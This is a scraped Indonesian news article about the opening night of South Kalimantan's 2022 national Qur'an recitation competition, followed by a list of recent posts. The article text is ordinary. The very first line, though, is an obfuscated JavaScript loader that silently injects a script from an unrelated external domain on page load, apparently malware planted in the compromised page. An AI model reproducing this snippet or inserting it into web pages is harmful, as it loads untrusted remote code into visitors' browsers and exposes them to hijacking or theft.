(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

52 Tahun Silam Menjadi Tuan Rumah, MTQ Nasional Kini Kembali ke Kalsel


KANALKALIMANTAN.COM, BANJARMASIN – Salah satu rangkaian kegiatan Musabaqah Tilawatil Qur’an (MTQ) Tingkat Nasional XXIX di Kalimantan Selatan yaitu Malam Ta’aruf digelar di titik 0 Kilometer Siring Kota Banjarmasin, Selasa (11/11/2022) malam.

Malam Ta’aruf dimeriahkan dengan berbagai macam pertunjukan dari Jukung Tanglong, Play Boarding, Parade Jukung Terapung hingga penampilan Seni Islami seperti Gambus dan Seni Madihin.

Gubernur Kalimantan Selatan H Sahbirin Noor mengatakan kerinduannya bersama masyarakat Kalsel selama 52 tahun terobati dengan dilaksanakannya MTQ Nasional XXIX di Kalimantan Selatan.

“Niat dan harapan kami tercapai, selama 52 tahun kami rindu menjadi tuan rumah MTQ Nasional, terakhir Kalsel menyelenggarakan pada tahun 1970,” ujarnya.

 

Penyerahan piala bergilir MTQ Nasional XXIX di Kalimantan Selatan tahun 2022. Foto: rizki

Baca juga : Sengaja Bawa Anak Perlihatkan Budaya 34 Provinsi di Pawai Ta’aruf MTQ Nasional XXIX

Sahbirin juga mengatakan bahwa banyak tempat wisata di Kalimantan Selatan yang bisa dinikmati oleh para kafilah seluruh Indonesia selama mengikuti MTQ.

“Ada makam Syekh Muhammad Arsyad Al Banjari dan Guru Sekumpul, ada juga tempat wisata alam Tahura Sultan Adam dengan spot foto yang menarik dengan pemandangan pegunungan Meratus,” katanya.

“Kalsel bagaikan sehelai kain dari surga,” tutup Gubernur Kalsel Sahbirin Noor.

 

Baca juga  : Ada 5 Venue MTQ Nasional XXIX di Kota Banjarbaru, Ini Lokasinya

Sementara itu, Ketua LPTQ Nasional yang diwakili oleh Wakil Ketua LPTQ mengatakan MTQ ke-29 ini merupakan momentum yang baik untuk memperkokoh ukhuwah Islamiyah yaitu persaudaraan yang saling menginspirasi dan menguatkan persatuan bangsa.

Menurutnya rasa rindu akan pelaksanaan MTQ dan lahirnya semangat membumikan Al Quran menjadi bukti akan kemuliaan Al Qur’an yang diturunkan untuk manusia.

“Inilah bukti bahwa Al Qur’an adalah Al Huda selalu memberi petunjuk dan kebahagian bagi siapa saja yang mengimaninya,” ujarnya.

 

Baca juga  : Menjadi Venue MTQ Nasional XXIX di Kalsel, Masjid Jami Sungai Jingah Dipersiapkan Sejak 2 Bulan

Para official kafilah dari seluruh Indonesia hingga masyarakat kota Banjarmasin terlihat memadati area pelaksanaan Malam Ta’aruf dengan parade Acil Jukung Terapung dan pertunjukan jukung hias di Sungai Martapura.

Pada Malam Ta’aruf juga dilaksanakan penyerahan piala MTQ Nasional XXIX Tahun 2022 bergilir dari LPTQ Nasional kepada Gubernur Kalimantan Selatan dan ditutup dengan pelepasan lampion terbang. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Desy Arfianty

Recent Posts

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

5 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

6 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

7 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

7 jam ago

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di… Read More

8 jam ago

Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur membuka Temu Teknis Penyuluh Pertanian se Kabupaten… Read More

8 jam ago

This website uses cookies.